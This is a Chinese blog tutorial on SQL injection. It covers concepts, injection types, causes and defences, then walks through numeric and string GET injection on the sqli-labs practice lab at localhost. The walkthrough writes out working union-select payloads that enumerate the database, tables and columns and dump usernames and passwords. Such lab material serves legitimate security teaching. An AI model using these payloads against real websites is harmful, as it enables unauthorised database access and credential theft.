SQL注入概述与GET注入实例

已于 2022-08-24 09:25:01 修改
阅读量1.2k 收藏 7
点赞数 2
分类专栏: WEB安全 网络安全 渗透测试 文章标签: sql 数据库 database
于 2022-02-18 15:30:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59872639/article/details/123002635
版权
网络安全 同时被 3 个专栏收录
51 篇文章 20 订阅
订阅专栏
渗透测试
40 篇文章 35 订阅
订阅专栏
WEB安全
32 篇文章 14 订阅
订阅专栏

SQL注入概述

什么是SQL注入漏洞

攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

SQL注入原理

服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。

两个条件

  • 用户能够控制输入
  • 原本程序要执行的SQL语句,拼接了用户输入的恶意数据

SQL注入过程

SQL注入危害

  • 绕过登录验证:使用万能密码登录网站后台等
  • 获取敏感数据:获取网站管理员帐号、密码等
  • 文件系统操作:列目录,读取、写入文件等
  • 注册表操作:读取、写入、删除注册表等
  • 执行系统命令: 远程执行命令

防御方法 

严格过滤用户提交的参数

数据库信息加密

使用安全参数

使数据库服务器和web服务器分离

限制用户的权限

过滤危险函数

多层验证

 SQL注入分类

按照注入点类型分类

  • 数字型(整型)注入

输入的参数为整数,如ID、年龄、页码等,如果存在注入型漏洞,则为数字型(整型)注入

  • 字符型注入
  1. 输入的参数为字符串
  2. 与数字型注入的区别在于:字符型注入一般要使用单引号来闭合

按照注入技术(执行效果)分类

  • 基于布尔的盲注

即可以根据返回页面判断条件真假的注入。

  • 基于时间的盲注

即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

  • 基于报错的注入

即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

  • 联合查询注入

可以使用union的情况下的注入。

  • 堆查询注入

同时执行多条语句的注入。

SQL注入漏洞形成原因

动态字符串构建引起

  • 不正确的处理转义字符(宽字节注入)
  • 不正确的处理错误(报错泄露信息)
  • 不正确的处理联合查询
  • 不正确的处理多次提交(二次注入)

后台存在的问题

  • 后台无过滤或者编码用户数据
  • 数据库可以拼接用户传递的恶意代码

错误处理不当

  • 详细的内部错误消息显示给用户或攻击者
  • 错误信息可以直接给攻击者提供下一步攻击帮助 

 SQL注入过程

  1. 判断是否存在注入点;
  2. 判断字段长度(字段数)
  3. 判断字段回显位置;
  4. 判断数据库信息;
  5. 查找数据库名;
  6. 查找数据库表;
  7. 查找数据库表中所有字段以及字段值;
  8. 猜解账号密码;
  9. 登录管理员后台。

 SQL注入实例

数字型GET注入

判断注入点

http://127.0.0.1/sqli/Less-2/?id=1'

 页面报错 判断有注入点。

http://127.0.0.1/sqli/Less-2/?id=1' --+
http://127.0.0.1/sqli/Less-2/?id=1' #
http://127.0.0.1/sqli/Less-2/?id=1' --

尝试判断多种闭合字符时,均没有正常回显,因此先判断其为数字型

http://127.0.0.1/sqli/Less-2/?id=1 and 1=2

页面未正常回显,确认注入点为数字型

 判断字段数

http://127.0.0.1/sqli/Less-2/?id=1 order by 4

 报错,说明不是4列

http://127.0.0.1/sqli/Less-2/?id=1 order by 3

正常回显,判断列数为3

union select求显示位

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3

 回显位置为2和3

暴库

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3

 暴表

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

 暴字段

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'

 暴内容

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(id,password,username),3 from security.users

字符型GET注入

判断注入点

http://127.0.0.1/sqli/Less-1/?id=1'

 报错,判断有sql注入点,判断是否为字符型注入,判断注释符

http://127.0.0.1/sqli/Less-1/?id=1' --+

 输入--+后,页面正常回显,说明注释符判断正确

判断列数

http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+

求显示位 

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+

后面的暴库暴表暴字段操作与前面一样,不再演示 

.SYS.
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlserver2005 jar驱动包
10-17
- 遵循SQL注入防御策略,例如使用预编译的`PreparedStatement`。 综上所述,`sqlserver2005 jar驱动包`中的这三个jar文件是Java开发者与SQL Server 2005进行交互的重要工具,它们使Java应用能够通过JDBC接口执行...
实验:学习GET注入
茶花语的博客
02-25 4939
使用sqlmap工具,基于GET请求的SQL注入实验
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 835
owasp十大漏洞中第一的sql注入
sqli-labs 1-10(GET注入)新手通关详解(高手误入)_sqllabs前十关
最新发布
2401_84253132的博客
05-13 603
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
SQL注入--基于错误的GET单引号字符型注入
Leslieyzz的博客
02-14 473
SQL注入--基于错误的GET单引号字符型注入
SQL注入--get注入
weixin_52151447的博客
11-11 2398
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
SQL注入GET
qq_51393133的博客
09-11 875
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
SSH项目实例
01-09
以上是对SSH项目实例中可能涉及的关键技术点的概述,实际项目中还会包括更多的细节,如日志记录、性能优化、单元测试和持续集成等。理解并熟练掌握这些技术,对于构建高质量的Java Web应用至关重要。
sqlserver2005驱动jar包
07-17
9. 安全性:使用JDBC驱动时,应考虑安全性,比如使用预编译的`PreparedStatement`来防止SQL注入,以及及时关闭连接以释放资源。 10. 兼容性与升级:确保所使用的JDBC驱动与SQL Server 2005版本兼容,并注意微软可能...
hibernate实例.zip
05-30
2. **优势**:简化数据库操作,提高开发效率,减少SQL注入风险,支持多种数据库,易于维护和扩展。 ### Hibernate 架构 Hibernate 包含以下主要组件: 1. **Configuration**:负责读取配置文件,建立SessionFactory...
sqljdbc for SQLSERVER20005 2008
11-10
3. **安全配置**:在生产环境中,确保遵循最佳安全实践,例如限制连接池大小,使用预编译的SQL语句防止SQL注入等。 总结来说,“sqljdbc for SQLSERVER20005 2008”是一个关键的组件,让Java开发者能够无缝地集成...
GETsql注入教学
m0_67265441的博客
01-29 754
sql注入的原理:攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。这说明后台在接受id这一个参数时and 1=1(真值),and 1=2(假值)生效了。第二步:判断列长度(靶场利用sqli-labs做为演示),以此来利用服务器进行恶意操作(一部分借鉴百度百科)。利用order by 语句和2分法可以判断出列长度为3。第三步:利用UNION SELECT判断回显位。通过刚刚的回显位来吧代码插入其中。第七步:通过列名把数据都列出来。第六步:通过表名查询列名。第一步:判断页面真假值。
SQL注入漏洞-GET注入
HacHunter的博客
03-05 2872
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
pikachu靶场--SQL inject--数字型(post)/字符型(get)/搜索型/xx型注入【4.1】~【4.4】
lmei1228的博客
06-10 775
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着注释的意思,把后面的单引号注释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 605
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
网络安全——基于联合查询的字符型GET注入
weixin_54055099的博客
09-08 599
SQL注入之基于联合查询的字符GET注入
SQL注入知识点总结
千寻的博客
02-11 1083
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
CTF练习:SQL注入get参数注入
qq_43233085的博客
11-24 3951
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 641
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
网络安全技术13SQL注入.pptx
11-12
"网络安全技术13SQL注入.pptx" 这篇资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值